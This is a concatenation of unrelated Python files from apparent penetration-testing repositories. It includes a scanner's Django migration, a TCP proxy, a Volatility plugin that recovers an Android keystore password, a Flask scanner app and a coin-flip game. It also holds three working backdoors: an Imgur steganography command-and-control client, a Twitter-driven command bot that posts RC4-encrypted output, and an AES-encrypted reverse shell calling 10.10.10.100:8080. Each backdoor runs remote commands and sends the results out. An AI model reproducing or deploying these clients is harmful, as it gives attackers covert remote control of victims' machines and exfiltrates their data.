'page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Page']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'query_id': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.page': {
'Meta': {'object_name': 'Page'},
'URL': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'auth_visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'connection_details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page_found_on': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Project']"}),
'status_code': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'visited': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'xtreme_server.project': {
'Meta': {'object_name': 'Project'},
'addParameter': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'addParameter_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
'login_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'logout_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'password': ('django.db.models.fields.TextField', [], {}),
'password_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"}),
'project_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'query_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'start_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Not Set'", 'max_length': '50'}),
'username': ('django.db.models.fields.TextField', [], {}),
'username_field': ('django.db.models.fields.TextField', [], {'default': "'Not Set'"})
},
u'xtreme_server.settings': {
'Meta': {'object_name': 'Settings'},
'allowed_extensions': ('django.db.models.fields.TextField', [], {}),
'allowed_protocols': ('django.db.models.fields.TextField', [], {}),
'auth_mode': ('django.db.models.fields.TextField', [], {}),
'consider_only': ('django.db.models.fields.TextField', [], {}),
'exclude_fields': ('django.db.models.fields.TextField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'password': ('django.db.models.fields.TextField', [], {}),
'username': ('django.db.models.fields.TextField', [], {})
},
u'xtreme_server.vulnerability': {
'Meta': {'object_name': 'Vulnerability'},
'auth': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'form': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['xtreme_server.Form']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'msg': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'msg_type': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'project': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
're_attack': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'url': ('django.db.models.fields.TextField', [], {'blank': 'True'})
}
}
complete_apps = ['xtreme_server'] | 64.357798 | 130 | 0.571208 |
cybersecurity-penetration-testing | #!/usr/bin/python
import sys
import socket
import argparse
import threading
config = {
'debug': False,
'verbose': False,
'timeout' : 5.0,
}
# =========================================================
# CUSTOM ANALYSIS, FUZZING, INTERCEPTION ROUTINES.
def requestHandler(buff):
'''
Modify any requests destined for the REMOTE host service.
'''
return buff
def responseHandler(buff):
'''
Modify any responses destined for the LOCAL host service.
'''
return buff
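# Illustrative sketch of a custom handler (an assumption, not wired in by default):
# rewrites a Host header before the buffer is forwarded to the REMOTE service.
# Swap it in for requestHandler() above if that behaviour is wanted.
def exampleHostRewriteHandler(buff):
    return buff.replace('Host: intranet.local', 'Host: 127.0.0.1')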
# =========================================================
class Logger:
@staticmethod
def _out(x):
if config['debug'] or config['verbose']:
sys.stderr.write(x + '\n')
@staticmethod
def dbg(x):
if config['debug']:
sys.stderr.write('[dbg] ' + x + '\n')
@staticmethod
def out(x):
Logger._out('[.] ' + x)
@staticmethod
def info(x):
Logger._out('[?] ' + x)
@staticmethod
def err(x, fatal = False):
Logger._out('[!] ' + x)
if fatal: sys.exit(-1)
@staticmethod
def fail(x, fatal = False):
Logger._out('[-] ' + x)
if fatal: sys.exit(-1)
@staticmethod
def ok(x):
Logger._out('[+] ' + x)
def hexdump(src, length = 16):
result = []
digits = 4 if isinstance(src, unicode) else 2
num = len(src)
for i in range(0, num, length):
s = src[i:i+length]
hexa = b' '.join(['%0*X' % (digits, ord(x)) for x in s])
text = b''.join([x if 0x20 <= ord(x) < 0x7f else b'.' for x in s])
result.append(b'%04x | %-*s | %s' % (i, length * (digits + 1), hexa, text))
return str(b'\n'.join(result))
def recvFrom(sock):
'''
Simple recvAll based on timeout exception.
'''
buff = ''
sock.settimeout(config['timeout'])
try:
while True:
data = sock.recv(4096)
if not data: break
buff += data
except:
pass
return buff
def proxyHandler(clientSock, remoteHost, remotePort, recvFirst):
Logger.dbg('Connecting to REMOTE service: {}:{}'.format(remoteHost, remotePort))
try:
remoteSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remoteSock.settimeout(config['timeout'])
remoteSock.connect((remoteHost, remotePort))
Logger.dbg('Connected.')
except Exception as e:
Logger.err('TCP Proxy was unable to connect to REMOTE service: {}:{}'.format(
remoteHost, remotePort), fatal = True
)
if recvFirst:
remoteBuff = recvFrom(remoteSock)
Logger.info('[<==] Received {} bytes from REMOTE service.'.format(len(remoteBuff)))
Logger.dbg('Remote service Recv buff BEFORE responseHandler:\n' + hexdump(remoteBuff))
remoteBuffOrig = remoteBuff
remoteBuff = responseHandler(remoteBuff)
if remoteBuff != remoteBuffOrig:
Logger.dbg('Buffer to be sent to LOCAL service modified. Lengths: {} -> {}'.format(
				len(remoteBuffOrig), len(remoteBuff)))
Logger.dbg('Remote service Recv buff AFTER responseHandler:\n' + hexdump(remoteBuff))
if len(remoteBuff):
Logger.info('[<==] Sending {} bytes to LOCAL service.'.format(len(remoteBuff)))
clientSock.send(remoteBuff)
# Send & Receive / Proxy loop
while True:
# LOCAL part
localBuff = recvFrom(clientSock)
if len(localBuff):
Logger.info('[==>] Received {} bytes from LOCAL service.'.format(len(localBuff)))
Logger.dbg('Local service Recv buff:\n' + hexdump(localBuff))
localBuffOrig = localBuff
localBuff = requestHandler(localBuff)
if localBuff != localBuffOrig:
Logger.dbg('Buffer to be sent to REMOTE service modified. Lengths: {} -> {}'.format(
					len(localBuffOrig), len(localBuff)))
Logger.dbg('Local service Recv buff AFTER requestHandler:\n' + hexdump(localBuff))
remoteSock.send(localBuff)
Logger.info('[==>] Sent to REMOTE service.')
# REMOTE part
remoteBuff = recvFrom(remoteSock)
if len(remoteBuff):
Logger.info('[<==] Received {} bytes from REMOTE service.'.format(len(remoteBuff)))
Logger.dbg('Remote service Recv buff:\n' + hexdump(remoteBuff))
remoteBuffOrig = remoteBuff
remoteBuff = responseHandler(remoteBuff)
if remoteBuff != remoteBuffOrig:
Logger.dbg('Buffer to be sent to LOCAL service modified. Lengths: {} -> {}'.format(
					len(remoteBuffOrig), len(remoteBuff)))
Logger.dbg('Remote service Recv buff AFTER responseHandler:\n' + hexdump(remoteBuff))
clientSock.send(remoteBuff)
Logger.info('[<==] Sent to LOCAL service.')
if not len(localBuff) or not len(remoteBuff):
clientSock.close()
remoteSock.close()
Logger.info('No more data. Closing connections.')
break
def serverLoop(localHost, localPort, remoteHost, remotePort, receiveFirst):
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
serv.bind((localHost, localPort))
Logger.ok('TCP Proxy listening on: {}:{}'.format(localHost, localPort))
serv.listen(5)
except Exception as e:
		Logger.err('TCP Proxy server was unable to bind to {}:{}'.format(localHost, localPort), fatal = True)
while True:
clientSock, addr = serv.accept()
Logger.info('[==>] Received incoming connection from: {}:{}'.format(addr[0], addr[1]))
proxyThread = threading.Thread(
target = proxyHandler,
args = (
clientSock,
remoteHost,
remotePort,
receiveFirst
)
)
proxyThread.start()
def processOpts(argv):
global config
usageStr = '''
tcpproxy.py [options] <LOCAL> <REMOTE>
Example:
tcpproxy.py 127.0.0.1:9000 192.168.56.102:9000
'''
parser = argparse.ArgumentParser(prog = argv[0], usage = usageStr)
parser.add_argument('localhost', metavar='LOCAL', type=str,
help = 'Local service to proxy (host:port)')
parser.add_argument('remotehost', metavar='REMOTE', type=str,
help = 'Remote service to proxy to (host:port)')
parser.add_argument('-r', '--recvfirst', dest='recvfirst', action='store_true', default = False,
		help='Make the proxy first receive something, then respond.')
parser.add_argument('-t', '--timeout', metavar='timeout', dest='timeout', default = config['timeout'],
help='Specifies service connect & I/O timeout. Default: {}.'.format(config['timeout']))
parser.add_argument('-v', '--verbose', dest='verbose', action='store_true',
help='Show verbose output.')
parser.add_argument('-d', '--debug', dest='debug', action='store_true',
help='Show more verbose, debugging output.')
if len(sys.argv[1:]) < 2:
parser.print_help()
sys.exit(0)
args = parser.parse_args()
if args.debug:
config['debug'] = args.debug
if args.verbose:
config['verbose'] = args.verbose
config['timeout'] = float(args.timeout)
Logger.dbg('Timeout set to: {} seconds.'.format(args.timeout))
return (args.localhost, args.remotehost, args.recvfirst)
def main():
local, remote, recvfirst = processOpts(sys.argv)
localHost, localPort = local.split(':')
remoteHost, remotePort = remote.split(':')
try:
localPort = int(localPort)
if localPort < 0 or localPort > 65535:
raise ValueError
except ValueError:
Logger.err('Invalid LOCAL port specified.', fatal = True)
try:
remotePort = int(remotePort)
if remotePort < 0 or remotePort > 65535:
raise ValueError
except ValueError:
		Logger.err('Invalid REMOTE port specified.', fatal = True)
Logger.info('Proxying: {}:{} => {}:{}'.format(
localHost, localPort, remoteHost, remotePort
))
serverLoop(localHost, localPort, remoteHost, remotePort, recvfirst)
if __name__ == '__main__':
main()
| 31.720755 | 115 | 0.555133 |
cybersecurity-penetration-testing | from imgurpython import ImgurClient
import StegoText
import ast, os, time, shlex, subprocess, base64, random, sys
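# Imgur steganography C2 client: commands and responses are hidden in meme images via StegoText
# and exchanged through the first album of the configured Imgur account.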
def get_input(string):
try:
return raw_input(string)
except:
return input(string)
def authenticate():
client_id = '<YOUR CLIENT ID>'
client_secret = '<YOUR CLIENT SECRET>'
client = ImgurClient(client_id, client_secret)
authorization_url = client.get_auth_url('pin')
print("Go to the following URL: {0}".format(authorization_url))
pin = get_input("Enter pin code: ")
credentials = client.authorize(pin, 'pin')
client.set_user_auth(credentials['access_token'], credentials['refresh_token'])
return client
client_uuid = "test_client_1"
client = authenticate()
a = client.get_account_albums("<YOUR IMGUR USERNAME>")
imgs = client.get_album_images(a[0].id)
last_message_datetime = imgs[-1].datetime
steg_path = StegoText.hide_message(random.choice(client.default_memes()).link,
"{'os':'" + os.name + "', 'uuid':'" + client_uuid + "','status':'ready'}",
"Imgur1.png",True)
uploaded = client.upload_from_path(steg_path)
client.album_add_images(a[0].id, uploaded['id'])
last_message_datetime = uploaded['datetime']
loop = True
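# Poll the album every 5 seconds; any image newer than the last one seen may carry a command.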
while loop:
time.sleep(5)
imgs = client.get_album_images(a[0].id)
if imgs[-1].datetime > last_message_datetime:
last_message_datetime = imgs[-1].datetime
client_dict = ast.literal_eval(StegoText.extract_message(imgs[-1].link, True))
if client_dict['uuid'] == client_uuid:
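            # The command arrives base32-encoded inside the extracted message; decode and run it.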
command = base64.b32decode(client_dict['command'])
if command == "quit":
sys.exit(0)
args = shlex.split(command)
p = subprocess.Popen(args, stdout=subprocess.PIPE, shell=True)
(output, err) = p.communicate()
p_status = p.wait()
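            # Hide the base32-encoded output in a new meme image and upload it to the album as the response.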
steg_path = StegoText.hide_message(random.choice(client.default_memes()).link,
"{'os':'" + os.name + "', 'uuid':'" + client_uuid + "','status':'response', 'response':'" + str(base64.b32encode(output)) + "'}",
"Imgur1.png", True)
uploaded = client.upload_from_path(steg_path)
client.album_add_images(a[0].id, uploaded['id'])
last_message_datetime = uploaded['datetime']
| 36.179104 | 165 | 0.576707 |
cybersecurity-penetration-testing | import random
print('I will flip a coin 1000 times. Guess how many times it will come up heads. (Press enter to begin)')
input('> ')
flips = 0
heads = 0
while flips < 1000:
if random.randint(0, 1) == 1:
heads = heads + 1
flips = flips + 1
if flips == 900:
print('900 flips and there have been ' + str(heads) + ' heads.')
if flips == 100:
print('At 100 tosses, heads has come up ' + str(heads) + ' times so far.')
if flips == 500:
print('Half way done, and heads has come up ' + str(heads) + ' times.')
print()
print('Out of 1000 coin tosses, heads came up ' + str(heads) + ' times!')
print('Were you close?') | 33.1 | 107 | 0.584435 |
cybersecurity-penetration-testing | from twitter import *
import os
from Crypto.Cipher import ARC4
import subprocess
import time
token = ''
token_key = ''
con_secret = ''
con_secret_key = ''
t = Twitter(auth=OAuth(token, token_key, con_secret, con_secret_key))
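# Check the timeline every hour: the newest tweet carries the command, the one before it the RC4 key.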
while 1:
user = t.statuses.user_timeline()
command = user[0]["text"].encode('utf-8')
key = user[1]["text"].encode('hex')
enc = ARC4.new(key)
response = subprocess.check_output(command.split())
enres = enc.encrypt(response).encode("base64")
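    # A tweet is limited to 140 characters, so post the encrypted output in 140-character chunks.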
for i in xrange(0, len(enres), 140):
t.statuses.update(status=enres[i:i+140])
time.sleep(3600)
| 23.28 | 70 | 0.655116 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python3.5
a=22;b=44;c=55;d=None
if a and b and c and d:
print("All not none")
elif b and c and d :
print('A seems to be none')
elif a and c and d:
print('B seems to be None')
elif a and b and d :
print('C seems to be None')
elif a and b and c :
print('D seems to be NOne')
else:
print("Strange !!")
| 15.954545 | 28 | 0.629032 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-15
# @File : __init__.py.py
# @Desc : ""
| 16 | 27 | 0.481481 |
Python-for-Offensive-PenTest | # Python For Offensive PenTest
# Download Pycrypto for Windows - pycrypto 2.6 for win32 py 2.7
# http://www.voidspace.org.uk/python/modules.shtml#pycrypto
# Download Pycrypto source
# https://pypi.python.org/pypi/pycrypto
# For Kali, after extracting the tar file, invoke "python setup.py install"
# AES - Client - TCP Reverse Shell
import socket
import subprocess
from Crypto.Cipher import AES
counter = "H"*16
key = "H"*32
def encrypt(message):
encrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
return encrypto.encrypt(message)
def decrypt(message):
decrypto = AES.new(key, AES.MODE_CTR, counter=lambda: counter)
return decrypto.decrypt(message)
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.10.100', 8080))
while True:
command = decrypt(s.recv(1024))
print ' We received: ' + command
if 'terminate' in command:
s.close()
break
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send( encrypt (CMD.stdout.read() ) )
s.send( encrypt (CMD.stderr.read()) )
def main ():
connect()
main()
| 22.806452 | 127 | 0.56 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Copyright (C) 2015 Christian Hilgers, Holger Macht, Tilo Müller, Michael Spreitzenbarth
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import volatility.obj as obj
import volatility.plugins.linux.common as linux_common
import volatility.plugins.linux.pslist as linux_pslist
import volatility.plugins.linux.dalvik as dalvik
import volatility.plugins.linux.dalvik_loaded_classes as dalvik_loaded_classes
import volatility.plugins.linux.dalvik_find_class_instance as dalvik_find_class_instance
import time
###################################################################################################
class dalvik_app_password(linux_common.AbstractLinuxCommand):
###################################################################################################
def __init__(self, config, *args, **kwargs):
linux_common.AbstractLinuxCommand.__init__(self, config, *args, **kwargs)
dalvik.register_option_PID(self._config)
dalvik.register_option_GDVM_OFFSET(self._config)
###################################################################################################
def calculate(self):
# if no gDvm object offset was specified, use this one
if not self._config.GDVM_OFFSET:
self._config.GDVM_OFFSET = str(0x41b0)
# use linux_pslist plugin to find process address space and ID if not specified
proc_as = None
tasks = linux_pslist.linux_pslist(self._config).calculate()
for task in tasks:
if str(task.comm) == "keystore":
proc_as = task.get_process_address_space()
self._config.PID = str(task.pid)
break
# find stack
for task, vma in dalvik.get_data_section_stack(self._config):
# read length and password, they seem to have constant offset
length = obj.Object('int', offset = vma.vm_start + 0x1982c, vm = proc_as)
password = obj.Object('String', offset = vma.vm_start + 0x19830,
vm = proc_as, length = length)
yield password
###################################################################################################
def render_text(self, outfd, data):
self.table_header(outfd, [ ("Password", "20")
])
for password in data:
self.table_row( outfd,
password)
| 44.742857 | 99 | 0.546704 |
PenetrationTestingScripts | from flask import Flask, render_template
from string import digits, ascii_lowercase
from random import sample
from fuxi.views.authenticate import login_check, authenticate
from fuxi.views.index import index
from fuxi.views.vul_scanner import vul_scanner
from fuxi.views.asset_management import asset_management
from fuxi.views.plugin_management import plugin_management
from fuxi.views.settings import settings
from fuxi.views.dashboard import dashboard
from fuxi.views.port_scanner import port_scanner
from fuxi.views.subdomain_brute import subdomain_brute
from fuxi.views.acunetix_scanner import acunetix_scanner
from fuxi.views.auth_tester import auth_tester
app = Flask(__name__)
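# Sign sessions with a random 10-character secret key generated at startup.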
app.config['SECRET_KEY'] = ''.join(sample(digits + ascii_lowercase, 10))
app.register_blueprint(authenticate)
app.register_blueprint(index)
app.register_blueprint(vul_scanner)
app.register_blueprint(asset_management)
app.register_blueprint(plugin_management)
app.register_blueprint(settings)
app.register_blueprint(dashboard)
app.register_blueprint(port_scanner)
app.register_blueprint(subdomain_brute)
app.register_blueprint(acunetix_scanner)
app.register_blueprint(auth_tester)
@app.errorhandler(404)
@login_check
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
@login_check
def internal_server_error(e):
return render_template('500.html'), 500
| 31.209302 | 72 | 0.811416 |